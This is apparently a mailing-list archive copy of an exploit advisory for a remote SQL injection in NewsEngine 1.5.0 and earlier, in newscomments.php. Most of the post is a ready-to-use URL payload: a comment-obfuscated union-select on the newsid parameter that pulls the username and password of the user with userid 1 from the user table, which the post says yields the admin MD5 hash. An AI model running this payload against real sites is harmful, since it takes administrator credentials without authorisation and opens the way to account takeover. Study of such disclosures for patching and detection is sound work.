ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

# Title  :   NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
# Author :   ajann

### Vulnerability;

$$$ http://[target]/[path]/newscomments.php

Example:

$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/news1_user/**/where/**/userid=1/*

Admin MD5 HaSh
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux